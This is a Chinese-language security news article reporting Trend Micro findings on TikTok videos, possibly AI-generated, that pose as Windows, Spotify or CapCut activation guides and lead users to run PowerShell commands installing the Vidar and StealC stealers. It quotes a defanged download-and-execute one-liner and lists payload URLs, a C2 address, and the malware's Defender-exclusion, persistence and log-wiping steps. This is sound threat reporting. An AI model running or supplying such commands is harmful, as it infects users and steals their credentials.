趨勢科技（Trend Micro）最新研究揭露，TikTok平臺正出現(xiàn)一種新型威脅：AI生成的視頻誘騙用戶執(zhí)行惡意PowerShell命令，使其暴露在強大的信息竊取惡意軟件風(fēng)險之下。

導(dǎo)致Vidar和StealC惡意軟件的感染鏈條 | 圖片來源：Trend Micro

社交工程攻擊新手法

趨勢科技近期曝光了一起危險的社交工程攻擊活動，黑客利用TikTok的病毒式傳播平臺分發(fā)Vidar和StealC——兩種復(fù)雜的信息竊取惡意軟件家族。網(wǎng)絡(luò)犯罪分子通過AI生成內(nèi)容和利用用戶信任，將看似無害的視頻教程轉(zhuǎn)變?yōu)閻阂廛浖鞑ポd體。

報告指出："這類攻擊使用視頻（可能由AI生成）誘導(dǎo)用戶執(zhí)行PowerShell命令，這些命令被偽裝成軟件激活步驟。"

攻擊傳播機(jī)制

攻擊始于@gitallowed、@zane.houghton和@sysglow.wow等TikTok賬號分享的匿名教程視頻，指導(dǎo)觀眾激活Windows、Spotify或CapCut等軟件。部分視頻播放量超過50萬次，展示的"激活"步驟最終會引導(dǎo)用戶執(zhí)行如下PowerShell命令：

iex (irm hxxps://allaivo[.]me/spotify)

趨勢科技強調(diào)："視頻指示觀眾運行一系列命令...指導(dǎo)語音也疑似AI生成，進(jìn)一步表明攻擊者使用AI工具制作這些視頻。"

該命令會下載并執(zhí)行遠(yuǎn)程腳本，啟動一個兼具隱蔽性和持久性的惡意軟件投放鏈。

攻擊流程詳解

• 用戶觀看TikTok視頻后直接執(zhí)行PowerShell命令
• 從hxxps://allaivo[.]me/spotify下載并運行遠(yuǎn)程腳本
• 在APPDATA和LOCALAPPDATA創(chuàng)建隱藏目錄，并添加到Windows Defender排除列表
• 下載二級有效載荷——通常是從hxxps://amssh[.]co/file.exe獲取的Vidar或StealC
• 從hxxps://amssh[.]co/script.ps1獲取最終持久化腳本，使惡意軟件能在系統(tǒng)重啟后繼續(xù)運行
• 刪除日志和臨時文件夾以掩蓋取證證據(jù)

趨勢科技警告稱："腳本采用重試邏輯確保有效載荷成功下載，然后以隱藏的提升權(quán)限進(jìn)程啟動惡意軟件可執(zhí)行文件。"

新型C&C通信技術(shù)

惡意軟件激活后，會使用新型規(guī)避技術(shù)與命令控制（C&C）服務(wù)器通信：

• Vidar利用Steam和Telegram等平臺作為Dead Drop Resolvers（DDR，死投解析器），將真實服務(wù)器地址隱藏在個人資料元數(shù)據(jù)中
• StealC直接連接基于IP的終端（如91[.]92[.]46[.]70）

研究人員指出："Vidar尤其濫用Steam和Telegram等合法服務(wù)作為死投解析器。"

AI驅(qū)動的惡意軟件新時代

TikTok算法放大效應(yīng)與AI生成欺騙手段的結(jié)合，標(biāo)志著惡意軟件傳播進(jìn)入新時代。正如趨勢科技強調(diào)："AI生成內(nèi)容的使用，使這類攻擊從孤立事件升級為高度可擴(kuò)展的運營活動。"